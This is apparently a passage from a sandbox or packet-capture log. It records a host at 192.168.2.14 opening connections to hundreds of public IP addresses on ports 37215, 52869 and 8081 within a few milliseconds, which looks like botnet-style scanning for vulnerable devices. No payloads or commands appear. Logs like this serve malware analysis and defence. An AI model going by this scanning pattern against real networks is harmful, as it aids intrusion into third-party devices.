                                                Jul 20, 2024 23:05:32.979784966 CEST2645437215192.168.2.14157.89.97.76
                                                Jul 20, 2024 23:05:32.979784966 CEST2645437215192.168.2.14197.11.168.175
                                                Jul 20, 2024 23:05:32.979784966 CEST2645437215192.168.2.1468.130.243.86
                                                Jul 20, 2024 23:05:32.979784966 CEST2645437215192.168.2.1441.77.83.15
                                                Jul 20, 2024 23:05:32.979784966 CEST2645437215192.168.2.14197.254.164.112
                                                Jul 20, 2024 23:05:32.979784966 CEST2645437215192.168.2.14157.154.194.96
                                                Jul 20, 2024 23:05:32.979914904 CEST2645437215192.168.2.14157.198.218.164
                                                Jul 20, 2024 23:05:32.979914904 CEST2645437215192.168.2.14157.180.63.164
                                                Jul 20, 2024 23:05:32.979914904 CEST2645437215192.168.2.144.254.214.150
                                                Jul 20, 2024 23:05:32.979914904 CEST2645437215192.168.2.1441.120.173.201
                                                Jul 20, 2024 23:05:32.979914904 CEST2645437215192.168.2.1441.61.134.33
                                                Jul 20, 2024 23:05:32.979914904 CEST2645437215192.168.2.1441.39.55.230
                                                Jul 20, 2024 23:05:32.979914904 CEST2645437215192.168.2.14157.90.15.17
                                                Jul 20, 2024 23:05:32.979984045 CEST80812671086.132.59.231192.168.2.14
                                                Jul 20, 2024 23:05:32.980119944 CEST2645437215192.168.2.14157.167.155.234
                                                Jul 20, 2024 23:05:32.980119944 CEST2645437215192.168.2.14157.102.116.14
                                                Jul 20, 2024 23:05:32.980119944 CEST2645437215192.168.2.14157.209.95.8
                                                Jul 20, 2024 23:05:32.980119944 CEST2645437215192.168.2.14157.244.39.139
                                                Jul 20, 2024 23:05:32.980119944 CEST2645437215192.168.2.144.233.23.250
                                                Jul 20, 2024 23:05:32.980119944 CEST2645437215192.168.2.14180.131.149.173
                                                Jul 20, 2024 23:05:32.980119944 CEST2645437215192.168.2.14197.135.250.212
                                                Jul 20, 2024 23:05:32.980119944 CEST2645437215192.168.2.14197.221.117.133
                                                Jul 20, 2024 23:05:32.980262995 CEST80812671052.144.91.154192.168.2.14
                                                Jul 20, 2024 23:05:32.980268955 CEST808126710198.88.91.70192.168.2.14
                                                Jul 20, 2024 23:05:32.980364084 CEST808126710207.185.26.121192.168.2.14
                                                Jul 20, 2024 23:05:32.980376005 CEST808126710150.89.194.250192.168.2.14
                                                Jul 20, 2024 23:05:32.980449915 CEST808126710204.51.21.15192.168.2.14
                                                Jul 20, 2024 23:05:32.980519056 CEST80812671059.80.220.189192.168.2.14
                                                Jul 20, 2024 23:05:32.980557919 CEST2645437215192.168.2.14157.44.152.62
                                                Jul 20, 2024 23:05:32.980557919 CEST2645437215192.168.2.14157.6.6.70
                                                Jul 20, 2024 23:05:32.980559111 CEST2645437215192.168.2.14197.177.127.219
                                                Jul 20, 2024 23:05:32.980559111 CEST2645437215192.168.2.14197.200.25.172
                                                Jul 20, 2024 23:05:32.980559111 CEST2645437215192.168.2.14198.52.243.181
                                                Jul 20, 2024 23:05:32.980559111 CEST2645437215192.168.2.14197.51.155.226
                                                Jul 20, 2024 23:05:32.980562925 CEST808126710212.244.103.179192.168.2.14
                                                Jul 20, 2024 23:05:32.980642080 CEST808126710144.3.205.255192.168.2.14
                                                Jul 20, 2024 23:05:32.980717897 CEST80812671074.52.65.245192.168.2.14
                                                Jul 20, 2024 23:05:32.980720043 CEST2645437215192.168.2.1441.38.100.53
                                                Jul 20, 2024 23:05:32.980720043 CEST2645437215192.168.2.1412.128.125.202
                                                Jul 20, 2024 23:05:32.980720043 CEST2645437215192.168.2.14197.142.236.247
                                                Jul 20, 2024 23:05:32.980720043 CEST2645437215192.168.2.1441.116.163.9
                                                Jul 20, 2024 23:05:32.980720043 CEST2645437215192.168.2.1441.153.40.162
                                                Jul 20, 2024 23:05:32.980720043 CEST2645437215192.168.2.14157.175.83.108
                                                Jul 20, 2024 23:05:32.980720043 CEST2645437215192.168.2.14195.187.81.252
                                                Jul 20, 2024 23:05:32.980720043 CEST2645437215192.168.2.14157.160.219.191
                                                Jul 20, 2024 23:05:32.981020927 CEST80812671038.141.196.232192.168.2.14
                                                Jul 20, 2024 23:05:32.981095076 CEST808126710137.216.212.224192.168.2.14
                                                Jul 20, 2024 23:05:32.981209993 CEST2645437215192.168.2.14197.226.139.107
                                                Jul 20, 2024 23:05:32.981209993 CEST2645437215192.168.2.14197.160.14.66
                                                Jul 20, 2024 23:05:32.981209993 CEST2645437215192.168.2.1417.2.163.174
                                                Jul 20, 2024 23:05:32.981209993 CEST2645437215192.168.2.1441.32.134.171
                                                Jul 20, 2024 23:05:32.981209993 CEST2645437215192.168.2.14105.5.39.199
                                                Jul 20, 2024 23:05:32.981210947 CEST2645437215192.168.2.14217.148.19.216
                                                Jul 20, 2024 23:05:32.981210947 CEST2645437215192.168.2.14157.125.110.28
                                                Jul 20, 2024 23:05:32.981210947 CEST2645437215192.168.2.1441.49.134.145
                                                Jul 20, 2024 23:05:32.981275082 CEST4363837215192.168.2.14197.164.78.122
                                                Jul 20, 2024 23:05:32.981276035 CEST267108081192.168.2.1468.142.16.29
                                                Jul 20, 2024 23:05:32.981276035 CEST267108081192.168.2.14196.195.106.170
                                                Jul 20, 2024 23:05:32.981276035 CEST267108081192.168.2.14123.248.86.232
                                                Jul 20, 2024 23:05:32.981276035 CEST267108081192.168.2.14209.31.133.182
                                                Jul 20, 2024 23:05:32.981276035 CEST267108081192.168.2.14132.5.201.125
                                                Jul 20, 2024 23:05:32.981276035 CEST267108081192.168.2.14106.194.179.185
                                                Jul 20, 2024 23:05:32.981276035 CEST267108081192.168.2.1480.69.194.155
                                                Jul 20, 2024 23:05:32.981276035 CEST267108081192.168.2.149.127.97.1
                                                Jul 20, 2024 23:05:32.981437922 CEST808126710140.167.178.189192.168.2.14
                                                Jul 20, 2024 23:05:32.981443882 CEST8081267104.217.21.135192.168.2.14
                                                Jul 20, 2024 23:05:32.981508970 CEST80812671064.40.177.253192.168.2.14
                                                Jul 20, 2024 23:05:32.981514931 CEST80812671051.155.174.92192.168.2.14
                                                Jul 20, 2024 23:05:32.981646061 CEST2645437215192.168.2.14157.38.7.171
                                                Jul 20, 2024 23:05:32.981646061 CEST2645437215192.168.2.1459.14.174.221
                                                Jul 20, 2024 23:05:32.981646061 CEST2645437215192.168.2.14197.166.150.170
                                                Jul 20, 2024 23:05:32.981646061 CEST2645437215192.168.2.14197.206.229.123
                                                Jul 20, 2024 23:05:32.981647015 CEST2645437215192.168.2.1441.149.22.215
                                                Jul 20, 2024 23:05:32.981647015 CEST2645437215192.168.2.14157.124.162.70
                                                Jul 20, 2024 23:05:32.981647015 CEST2645437215192.168.2.1441.150.62.234
                                                Jul 20, 2024 23:05:32.981669903 CEST808126710222.176.137.135192.168.2.14
                                                Jul 20, 2024 23:05:32.981678009 CEST2645437215192.168.2.14197.115.185.196
                                                Jul 20, 2024 23:05:32.981678009 CEST2645437215192.168.2.14157.163.113.146
                                                Jul 20, 2024 23:05:32.981678009 CEST2645437215192.168.2.1441.211.186.224
                                                Jul 20, 2024 23:05:32.981678009 CEST2645437215192.168.2.14197.117.134.207
                                                Jul 20, 2024 23:05:32.981678009 CEST2645437215192.168.2.14197.153.39.101
                                                Jul 20, 2024 23:05:32.981678009 CEST2645437215192.168.2.14197.161.120.240
                                                Jul 20, 2024 23:05:32.981678009 CEST2645437215192.168.2.14157.15.204.251
                                                Jul 20, 2024 23:05:32.981678009 CEST2645437215192.168.2.14197.103.91.244
                                                Jul 20, 2024 23:05:32.981726885 CEST808126710156.121.141.32192.168.2.14
                                                Jul 20, 2024 23:05:32.981985092 CEST808126710194.237.4.184192.168.2.14
                                                Jul 20, 2024 23:05:32.982112885 CEST80812671013.64.88.169192.168.2.14
                                                Jul 20, 2024 23:05:32.982287884 CEST2645437215192.168.2.14157.36.229.38
                                                Jul 20, 2024 23:05:32.982287884 CEST2645437215192.168.2.1441.252.152.68
                                                Jul 20, 2024 23:05:32.982287884 CEST2645437215192.168.2.1489.126.203.8
                                                Jul 20, 2024 23:05:32.982287884 CEST2645437215192.168.2.14197.23.181.153
                                                Jul 20, 2024 23:05:32.982287884 CEST2645437215192.168.2.14197.121.33.9
                                                Jul 20, 2024 23:05:32.982287884 CEST2645437215192.168.2.14170.84.72.112
                                                Jul 20, 2024 23:05:32.982287884 CEST2645437215192.168.2.14197.7.153.200
                                                Jul 20, 2024 23:05:32.982287884 CEST2645437215192.168.2.14144.183.98.117
                                                Jul 20, 2024 23:05:32.982338905 CEST267108081192.168.2.14203.166.85.237
                                                Jul 20, 2024 23:05:32.982340097 CEST267108081192.168.2.14135.187.104.178
                                                Jul 20, 2024 23:05:32.982434988 CEST2645437215192.168.2.1436.111.202.214
                                                Jul 20, 2024 23:05:32.982434988 CEST2645437215192.168.2.14212.72.163.168
                                                Jul 20, 2024 23:05:32.982435942 CEST2645437215192.168.2.14157.187.150.104
                                                Jul 20, 2024 23:05:32.982435942 CEST2645437215192.168.2.14197.156.88.210
                                                Jul 20, 2024 23:05:32.982435942 CEST2645437215192.168.2.14197.84.102.186
                                                Jul 20, 2024 23:05:32.982435942 CEST2645437215192.168.2.1414.149.139.73
                                                Jul 20, 2024 23:05:32.982435942 CEST2645437215192.168.2.14197.125.206.90
                                                Jul 20, 2024 23:05:32.982435942 CEST2645437215192.168.2.14197.201.186.113
                                                Jul 20, 2024 23:05:32.982497931 CEST80812671080.177.168.29192.168.2.14
                                                Jul 20, 2024 23:05:32.982633114 CEST2645437215192.168.2.14197.32.21.149
                                                Jul 20, 2024 23:05:32.982633114 CEST2645437215192.168.2.14197.127.12.98
                                                Jul 20, 2024 23:05:32.982633114 CEST2645437215192.168.2.14157.49.45.143
                                                Jul 20, 2024 23:05:32.982633114 CEST2645437215192.168.2.14156.13.249.58
                                                Jul 20, 2024 23:05:32.982633114 CEST2645437215192.168.2.14211.76.79.190
                                                Jul 20, 2024 23:05:32.982633114 CEST2645437215192.168.2.1441.7.69.144
                                                Jul 20, 2024 23:05:32.982633114 CEST2645437215192.168.2.14157.37.72.163
                                                Jul 20, 2024 23:05:32.982633114 CEST2645437215192.168.2.14157.60.120.82
                                                Jul 20, 2024 23:05:32.982883930 CEST2696652869192.168.2.14138.164.120.195
                                                Jul 20, 2024 23:05:32.982894897 CEST2696652869192.168.2.1498.174.9.207
                                                Jul 20, 2024 23:05:32.982894897 CEST2696652869192.168.2.14190.69.44.38
                                                Jul 20, 2024 23:05:32.982894897 CEST2696652869192.168.2.14220.201.193.98
                                                Jul 20, 2024 23:05:32.982894897 CEST2696652869192.168.2.1492.186.192.108
                                                Jul 20, 2024 23:05:32.982990980 CEST2696652869192.168.2.14195.132.173.234
                                                Jul 20, 2024 23:05:32.982990980 CEST2696652869192.168.2.141.45.97.104
                                                Jul 20, 2024 23:05:32.982991934 CEST2696652869192.168.2.14154.122.165.212
                                                Jul 20, 2024 23:05:32.982991934 CEST2696652869192.168.2.14137.146.36.17
                                                Jul 20, 2024 23:05:32.982990980 CEST2696652869192.168.2.14101.12.253.16
                                                Jul 20, 2024 23:05:32.982991934 CEST2696652869192.168.2.14177.114.82.149
                                                Jul 20, 2024 23:05:32.982990980 CEST2696652869192.168.2.1436.241.219.46
                                                Jul 20, 2024 23:05:32.982991934 CEST2696652869192.168.2.14100.205.17.171
                                                Jul 20, 2024 23:05:32.982991934 CEST2696652869192.168.2.14146.209.160.201
                                                Jul 20, 2024 23:05:32.982991934 CEST2696652869192.168.2.1463.116.203.26
                                                Jul 20, 2024 23:05:32.982991934 CEST2696652869192.168.2.14107.202.144.177
                                                Jul 20, 2024 23:05:32.983346939 CEST2645437215192.168.2.14197.169.147.234
                                                Jul 20, 2024 23:05:32.983346939 CEST2645437215192.168.2.14171.14.142.248
                                                Jul 20, 2024 23:05:32.983346939 CEST2645437215192.168.2.1441.187.215.175
                                                Jul 20, 2024 23:05:32.983346939 CEST2645437215192.168.2.14197.72.189.121
                                                Jul 20, 2024 23:05:32.983346939 CEST2645437215192.168.2.14157.171.94.238
                                                Jul 20, 2024 23:05:32.983346939 CEST2645437215192.168.2.1449.95.118.223
                                                Jul 20, 2024 23:05:32.983346939 CEST2645437215192.168.2.14197.127.78.0
                                                Jul 20, 2024 23:05:32.983346939 CEST2645437215192.168.2.14202.65.123.82
                                                Jul 20, 2024 23:05:32.983458996 CEST2645437215192.168.2.14157.14.91.47
                                                Jul 20, 2024 23:05:32.983458996 CEST2645437215192.168.2.14197.58.91.112
                                                Jul 20, 2024 23:05:32.983458996 CEST2645437215192.168.2.14157.124.200.93
                                                Jul 20, 2024 23:05:32.983458996 CEST2645437215192.168.2.14157.238.37.225
                                                Jul 20, 2024 23:05:32.983458996 CEST2645437215192.168.2.1441.53.164.225
                                                Jul 20, 2024 23:05:32.983458996 CEST267108081192.168.2.1479.65.15.86
                                                Jul 20, 2024 23:05:32.983458996 CEST267108081192.168.2.14154.96.127.148
                                                Jul 20, 2024 23:05:32.983458996 CEST267108081192.168.2.14185.10.141.196
                                                Jul 20, 2024 23:05:32.983570099 CEST2696652869192.168.2.14116.245.204.145
                                                Jul 20, 2024 23:05:32.983570099 CEST2696652869192.168.2.14200.20.7.27
                                                Jul 20, 2024 23:05:32.983570099 CEST2696652869192.168.2.14154.5.233.120
                                                Jul 20, 2024 23:05:32.983570099 CEST2696652869192.168.2.1475.252.5.161
                                                Jul 20, 2024 23:05:32.983570099 CEST2696652869192.168.2.14109.189.179.52
                                                Jul 20, 2024 23:05:32.983570099 CEST2696652869192.168.2.14184.143.106.37
                                                Jul 20, 2024 23:05:32.983570099 CEST2696652869192.168.2.1466.40.85.75
                                                Jul 20, 2024 23:05:32.983647108 CEST2645437215192.168.2.14143.121.44.178
                                                Jul 20, 2024 23:05:32.983647108 CEST2645437215192.168.2.14123.137.146.62
                                                Jul 20, 2024 23:05:32.983647108 CEST2645437215192.168.2.1441.172.220.222
                                                Jul 20, 2024 23:05:32.983647108 CEST2645437215192.168.2.14112.129.68.75
                                                Jul 20, 2024 23:05:32.983647108 CEST2645437215192.168.2.14157.211.160.103
                                                Jul 20, 2024 23:05:32.983647108 CEST2645437215192.168.2.14197.90.23.241
                                                Jul 20, 2024 23:05:32.983647108 CEST2645437215192.168.2.14157.12.238.255
                                                Jul 20, 2024 23:05:32.983647108 CEST2645437215192.168.2.1441.205.180.45
                                                Jul 20, 2024 23:05:32.983900070 CEST2645437215192.168.2.14157.64.217.121
                                                Jul 20, 2024 23:05:32.983900070 CEST2645437215192.168.2.14157.32.138.247
                                                Jul 20, 2024 23:05:32.983900070 CEST2645437215192.168.2.14197.65.95.250
                                                Jul 20, 2024 23:05:32.983900070 CEST2645437215192.168.2.1441.222.97.171
                                                Jul 20, 2024 23:05:32.983900070 CEST2645437215192.168.2.14157.16.161.82
                                                Jul 20, 2024 23:05:32.983900070 CEST2645437215192.168.2.14157.3.183.32
                                                Jul 20, 2024 23:05:32.983900070 CEST2645437215192.168.2.14157.92.161.18
                                                Jul 20, 2024 23:05:32.983900070 CEST2645437215192.168.2.1441.132.119.157
                                                Jul 20, 2024 23:05:32.983953953 CEST2696652869192.168.2.1474.141.119.215
                                                Jul 20, 2024 23:05:32.983953953 CEST2696652869192.168.2.14208.237.41.151
                                                Jul 20, 2024 23:05:32.983953953 CEST2696652869192.168.2.1452.251.60.172
                                                Jul 20, 2024 23:05:32.983953953 CEST2696652869192.168.2.1413.178.154.93
                                                Jul 20, 2024 23:05:32.983953953 CEST2696652869192.168.2.14176.76.161.145
                                                Jul 20, 2024 23:05:32.983953953 CEST2696652869192.168.2.14195.2.187.101
                                                Jul 20, 2024 23:05:32.983953953 CEST2696652869192.168.2.14124.241.110.37
                                                Jul 20, 2024 23:05:32.983953953 CEST2696652869192.168.2.14139.250.92.195
                                                Jul 20, 2024 23:05:32.984215021 CEST2696652869192.168.2.14135.15.136.25
                                                Jul 20, 2024 23:05:32.984215021 CEST2696652869192.168.2.1449.129.16.66
                                                Jul 20, 2024 23:05:32.984215021 CEST2696652869192.168.2.1475.200.101.89
                                                Jul 20, 2024 23:05:32.984215021 CEST2696652869192.168.2.14116.72.217.220
                                                Jul 20, 2024 23:05:32.984215021 CEST2696652869192.168.2.1471.167.191.150
                                                Jul 20, 2024 23:05:32.984215021 CEST2696652869192.168.2.14137.69.110.19
                                                Jul 20, 2024 23:05:32.984215021 CEST2696652869192.168.2.1470.199.176.14
                                                Jul 20, 2024 23:05:32.984215021 CEST2696652869192.168.2.142.130.184.163
                                                Jul 20, 2024 23:05:32.984249115 CEST80812671096.148.59.7192.168.2.14
                                                Jul 20, 2024 23:05:32.984416008 CEST808126710223.180.173.76192.168.2.14
                                                Jul 20, 2024 23:05:32.984568119 CEST2645437215192.168.2.1445.255.75.247
                                                Jul 20, 2024 23:05:32.984568119 CEST2645437215192.168.2.14157.69.223.72
                                                Jul 20, 2024 23:05:32.984568119 CEST267108081192.168.2.14144.212.176.48
                                                Jul 20, 2024 23:05:32.984568119 CEST267108081192.168.2.14117.245.165.81
                                                Jul 20, 2024 23:05:32.984568119 CEST267108081192.168.2.14142.221.68.139
                                                Jul 20, 2024 23:05:32.984568119 CEST267108081192.168.2.14219.160.226.219
                                                Jul 20, 2024 23:05:32.984568119 CEST267108081192.168.2.1460.150.104.141
                                                Jul 20, 2024 23:05:32.984568119 CEST267108081192.168.2.1454.159.244.112
                                                Jul 20, 2024 23:05:32.984594107 CEST80812671062.255.143.253192.168.2.14
                                                Jul 20, 2024 23:05:32.985027075 CEST2696652869192.168.2.14167.164.2.140
                                                Jul 20, 2024 23:05:32.985027075 CEST2696652869192.168.2.14148.179.41.139
                                                Jul 20, 2024 23:05:32.985027075 CEST2696652869192.168.2.14126.209.11.117
                                                Jul 20, 2024 23:05:32.985027075 CEST2696652869192.168.2.14219.149.146.116
                                                Jul 20, 2024 23:05:32.985027075 CEST2696652869192.168.2.14164.86.234.82
                                                Jul 20, 2024 23:05:32.985027075 CEST2696652869192.168.2.14195.83.179.247
                                                Jul 20, 2024 23:05:32.985027075 CEST2696652869192.168.2.1459.10.109.49
                                                Jul 20, 2024 23:05:32.985027075 CEST2696652869192.168.2.14189.165.252.97
                                                Jul 20, 2024 23:05:32.985063076 CEST267108081192.168.2.1477.90.229.150
                                                Jul 20, 2024 23:05:32.985063076 CEST267108081192.168.2.1419.136.136.40
                                                Jul 20, 2024 23:05:32.985063076 CEST267108081192.168.2.1419.178.203.31
                                                Jul 20, 2024 23:05:32.985063076 CEST267108081192.168.2.14201.200.204.159
                                                Jul 20, 2024 23:05:32.985063076 CEST267108081192.168.2.14222.235.148.149
                                                Jul 20, 2024 23:05:32.985063076 CEST267108081192.168.2.145.71.113.116
                                                Jul 20, 2024 23:05:32.985063076 CEST267108081192.168.2.14209.148.109.196
                                                Jul 20, 2024 23:05:32.985063076 CEST267108081192.168.2.14146.0.64.7
                                                Jul 20, 2024 23:05:32.985290051 CEST2696652869192.168.2.14222.34.224.235
                                                Jul 20, 2024 23:05:32.985290051 CEST2696652869192.168.2.141.58.166.60
                                                Jul 20, 2024 23:05:32.985290051 CEST2696652869192.168.2.1453.238.38.203
                                                Jul 20, 2024 23:05:32.985290051 CEST2696652869192.168.2.14176.7.139.158
                                                Jul 20, 2024 23:05:32.985290051 CEST2696652869192.168.2.1427.170.138.42
                                                Jul 20, 2024 23:05:32.985290051 CEST2696652869192.168.2.1413.75.217.137
                                                Jul 20, 2024 23:05:32.985290051 CEST2696652869192.168.2.1450.170.119.188
                                                Jul 20, 2024 23:05:32.985290051 CEST2696652869192.168.2.14198.140.246.167
                                                Jul 20, 2024 23:05:32.985447884 CEST2645437215192.168.2.14157.216.18.52
                                                Jul 20, 2024 23:05:32.985447884 CEST2645437215192.168.2.14157.153.230.28
                                                Jul 20, 2024 23:05:32.985447884 CEST2645437215192.168.2.1480.79.178.61
                                                Jul 20, 2024 23:05:32.985447884 CEST2645437215192.168.2.14197.129.93.34
                                                Jul 20, 2024 23:05:32.985447884 CEST2645437215192.168.2.14197.100.34.28
                                                Jul 20, 2024 23:05:32.985447884 CEST2645437215192.168.2.14197.25.53.252
                                                Jul 20, 2024 23:05:32.985447884 CEST2645437215192.168.2.1441.248.214.89
                                                Jul 20, 2024 23:05:32.985447884 CEST2645437215192.168.2.14157.42.39.209
                                                Jul 20, 2024 23:05:32.985774994 CEST2645437215192.168.2.14157.117.99.90
                                                Jul 20, 2024 23:05:32.985774994 CEST2645437215192.168.2.14197.162.132.10
                                                Jul 20, 2024 23:05:32.985774994 CEST2645437215192.168.2.14197.153.151.246
                                                Jul 20, 2024 23:05:32.985774994 CEST2645437215192.168.2.14197.102.240.254
                                                Jul 20, 2024 23:05:32.985774994 CEST2645437215192.168.2.14157.167.218.66
                                                Jul 20, 2024 23:05:32.985774994 CEST267108081192.168.2.14132.85.73.24
                                                Jul 20, 2024 23:05:32.985774994 CEST267108081192.168.2.14198.108.55.247
                                                Jul 20, 2024 23:05:32.985774994 CEST267108081192.168.2.1497.157.149.39
                                                Jul 20, 2024 23:05:32.986027956 CEST2696652869192.168.2.142.60.81.55
                                                Jul 20, 2024 23:05:32.986027956 CEST2696652869192.168.2.14175.232.171.213
                                                Jul 20, 2024 23:05:32.986027956 CEST2696652869192.168.2.1489.214.173.80
                                                Jul 20, 2024 23:05:32.986027956 CEST2696652869192.168.2.1450.34.178.254
                                                Jul 20, 2024 23:05:32.986027956 CEST2696652869192.168.2.14103.69.255.40
                                                Jul 20, 2024 23:05:32.986027956 CEST2696652869192.168.2.1485.220.223.104
                                                Jul 20, 2024 23:05:32.986027956 CEST2696652869192.168.2.14200.196.10.230
                                                Jul 20, 2024 23:05:32.986027956 CEST2696652869192.168.2.1444.208.10.155
                                                Jul 20, 2024 23:05:32.986063004 CEST267108081192.168.2.1470.140.34.75
                                                Jul 20, 2024 23:05:32.986063004 CEST267108081192.168.2.14201.54.101.13
                                                Jul 20, 2024 23:05:32.986063004 CEST267108081192.168.2.14163.101.102.166
                                                Jul 20, 2024 23:05:32.986063004 CEST267108081192.168.2.14173.177.143.72
                                                Jul 20, 2024 23:05:32.986063004 CEST267108081192.168.2.14108.148.217.67
                                                Jul 20, 2024 23:05:32.986063004 CEST267108081192.168.2.1440.159.161.138
                                                Jul 20, 2024 23:05:32.986063004 CEST267108081192.168.2.14182.219.207.228
                                                Jul 20, 2024 23:05:32.986063004 CEST267108081192.168.2.14154.223.107.127
                                                Jul 20, 2024 23:05:32.986084938 CEST3721543638197.164.78.122192.168.2.14
                                                Jul 20, 2024 23:05:32.986608982 CEST267108081192.168.2.14171.5.248.246
                                                Jul 20, 2024 23:05:32.986608982 CEST267108081192.168.2.14148.251.82.84
                                                Jul 20, 2024 23:05:32.986608982 CEST267108081192.168.2.14101.221.153.89
                                                Jul 20, 2024 23:05:32.986608982 CEST267108081192.168.2.1417.167.164.197
                                                Jul 20, 2024 23:05:32.986608982 CEST267108081192.168.2.14112.94.187.67
                                                Jul 20, 2024 23:05:32.986608982 CEST267108081192.168.2.1495.119.149.193
                                                Jul 20, 2024 23:05:32.986608982 CEST267108081192.168.2.1419.214.235.33
                                                Jul 20, 2024 23:05:32.986608982 CEST267108081192.168.2.14174.14.116.207
                                                Jul 20, 2024 23:05:32.986632109 CEST2696652869192.168.2.1491.250.252.167
                                                Jul 20, 2024 23:05:32.986632109 CEST2696652869192.168.2.14149.56.176.155
                                                Jul 20, 2024 23:05:32.986632109 CEST2696652869192.168.2.1447.199.208.171
                                                Jul 20, 2024 23:05:32.986632109 CEST2696652869192.168.2.14183.61.81.252
                                                Jul 20, 2024 23:05:32.986632109 CEST2696652869192.168.2.14171.96.179.158
                                                Jul 20, 2024 23:05:32.986632109 CEST2696652869192.168.2.14158.92.150.122
                                                Jul 20, 2024 23:05:32.986632109 CEST2696652869192.168.2.14140.177.178.70
                                                Jul 20, 2024 23:05:32.986632109 CEST2696652869192.168.2.1476.140.247.238
                                                Jul 20, 2024 23:05:32.986815929 CEST2696652869192.168.2.1487.126.198.90
                                                Jul 20, 2024 23:05:32.986815929 CEST2696652869192.168.2.14104.191.27.52
                                                Jul 20, 2024 23:05:32.986815929 CEST2696652869192.168.2.145.160.183.175
                                                Jul 20, 2024 23:05:32.986815929 CEST2696652869192.168.2.14121.9.221.164
                                                Jul 20, 2024 23:05:32.986815929 CEST2696652869192.168.2.14191.185.222.183
                                                Jul 20, 2024 23:05:32.986815929 CEST2696652869192.168.2.14147.123.144.58
                                                Jul 20, 2024 23:05:32.986815929 CEST2696652869192.168.2.1432.77.117.150
                                                Jul 20, 2024 23:05:32.986815929 CEST2696652869192.168.2.149.191.198.5
                                                Jul 20, 2024 23:05:32.986833096 CEST2645437215192.168.2.14157.8.14.14
                                                Jul 20, 2024 23:05:32.986833096 CEST267108081192.168.2.14122.135.106.228
                                                Jul 20, 2024 23:05:32.986833096 CEST267108081192.168.2.1499.243.81.85
                                                Jul 20, 2024 23:05:32.986833096 CEST267108081192.168.2.1432.105.9.164
                                                Jul 20, 2024 23:05:32.986833096 CEST267108081192.168.2.1462.68.232.116
                                                Jul 20, 2024 23:05:32.986833096 CEST267108081192.168.2.14168.69.56.63
                                                Jul 20, 2024 23:05:32.986833096 CEST267108081192.168.2.1448.192.221.16
                                                Jul 20, 2024 23:05:32.986833096 CEST267108081192.168.2.1449.252.222.13
                                                Jul 20, 2024 23:05:32.986860037 CEST2696652869192.168.2.14204.40.87.81
                                                Jul 20, 2024 23:05:32.986860037 CEST2696652869192.168.2.14134.188.221.235
                                                Jul 20, 2024 23:05:32.986860037 CEST2696652869192.168.2.1444.31.110.75
                                                Jul 20, 2024 23:05:32.986860037 CEST2696652869192.168.2.1438.176.103.136
                                                Jul 20, 2024 23:05:32.986860037 CEST2696652869192.168.2.14126.55.140.129
                                                Jul 20, 2024 23:05:32.986860037 CEST2696652869192.168.2.14169.190.202.84
                                                Jul 20, 2024 23:05:32.986860037 CEST2696652869192.168.2.14165.60.127.36
                                                Jul 20, 2024 23:05:32.986860037 CEST2696652869192.168.2.145.232.79.237
                                                Jul 20, 2024 23:05:32.986920118 CEST267108081192.168.2.1472.130.69.78
                                                Jul 20, 2024 23:05:32.986920118 CEST267108081192.168.2.14173.151.124.222
                                                Jul 20, 2024 23:05:32.986920118 CEST267108081192.168.2.14159.58.177.248
                                                Jul 20, 2024 23:05:32.986920118 CEST267108081192.168.2.1492.227.24.56
                                                Jul 20, 2024 23:05:32.986920118 CEST267108081192.168.2.14134.192.178.255
                                                Jul 20, 2024 23:05:32.986920118 CEST267108081192.168.2.1460.58.246.160
                                                Jul 20, 2024 23:05:32.986920118 CEST267108081192.168.2.1481.238.47.164
                                                Jul 20, 2024 23:05:32.986920118 CEST267108081192.168.2.1494.224.13.155
                                                Jul 20, 2024 23:05:32.987639904 CEST2696652869192.168.2.14152.243.247.201
                                                Jul 20, 2024 23:05:32.987639904 CEST2696652869192.168.2.14183.9.77.244
                                                Jul 20, 2024 23:05:32.987639904 CEST2696652869192.168.2.14156.78.197.145
                                                Jul 20, 2024 23:05:32.987639904 CEST2696652869192.168.2.14218.67.237.164
                                                Jul 20, 2024 23:05:32.987639904 CEST2696652869192.168.2.1488.176.198.201
                                                Jul 20, 2024 23:05:32.987639904 CEST2696652869192.168.2.14184.21.171.187
                                                Jul 20, 2024 23:05:32.987639904 CEST2696652869192.168.2.1472.95.53.29
                                                Jul 20, 2024 23:05:32.987639904 CEST2696652869192.168.2.14199.21.210.243
                                                Jul 20, 2024 23:05:32.987798929 CEST267108081192.168.2.14197.113.230.79
                                                Jul 20, 2024 23:05:32.987798929 CEST267108081192.168.2.14184.191.112.115
                                                Jul 20, 2024 23:05:32.987798929 CEST267108081192.168.2.14209.209.65.203
                                                Jul 20, 2024 23:05:32.987798929 CEST267108081192.168.2.14204.47.171.208
                                                Jul 20, 2024 23:05:32.987798929 CEST267108081192.168.2.1470.119.165.179
                                                Jul 20, 2024 23:05:32.987798929 CEST267108081192.168.2.1472.51.13.222
                                                Jul 20, 2024 23:05:32.987798929 CEST267108081192.168.2.1452.144.91.154
                                                Jul 20, 2024 23:05:32.988002062 CEST2696652869192.168.2.1437.99.224.222
                                                Jul 20, 2024 23:05:32.988002062 CEST2696652869192.168.2.14201.81.64.36
                                                Jul 20, 2024 23:05:32.988002062 CEST2696652869192.168.2.14139.188.16.31
                                                Jul 20, 2024 23:05:32.988002062 CEST2696652869192.168.2.14148.95.243.46
                                                Jul 20, 2024 23:05:32.988002062 CEST2696652869192.168.2.14107.251.94.11
                                                Jul 20, 2024 23:05:32.988002062 CEST2696652869192.168.2.1477.61.124.164
                                                Jul 20, 2024 23:05:32.988002062 CEST2696652869192.168.2.14129.207.205.38
                                                Jul 20, 2024 23:05:32.988002062 CEST2696652869192.168.2.14106.163.160.106
                                                Jul 20, 2024 23:05:32.988184929 CEST267108081192.168.2.1457.210.21.203
                                                Jul 20, 2024 23:05:32.988184929 CEST2696652869192.168.2.1468.250.159.53
                                                Jul 20, 2024 23:05:32.988184929 CEST2696652869192.168.2.14159.74.127.98
                                                Jul 20, 2024 23:05:32.988184929 CEST2696652869192.168.2.1414.114.54.117
                                                Jul 20, 2024 23:05:32.988184929 CEST2696652869192.168.2.14137.42.37.39
                                                Jul 20, 2024 23:05:32.988184929 CEST2696652869192.168.2.1452.2.251.135
                                                Jul 20, 2024 23:05:32.988184929 CEST2696652869192.168.2.14144.179.122.233
                                                Jul 20, 2024 23:05:32.988184929 CEST2696652869192.168.2.14177.202.204.36
                                                Jul 20, 2024 23:05:32.988244057 CEST5286926966138.164.120.195192.168.2.14
                                                Jul 20, 2024 23:05:32.988250017 CEST528692696698.174.9.207192.168.2.14
                                                Jul 20, 2024 23:05:32.988265038 CEST5286926966195.132.173.234192.168.2.14
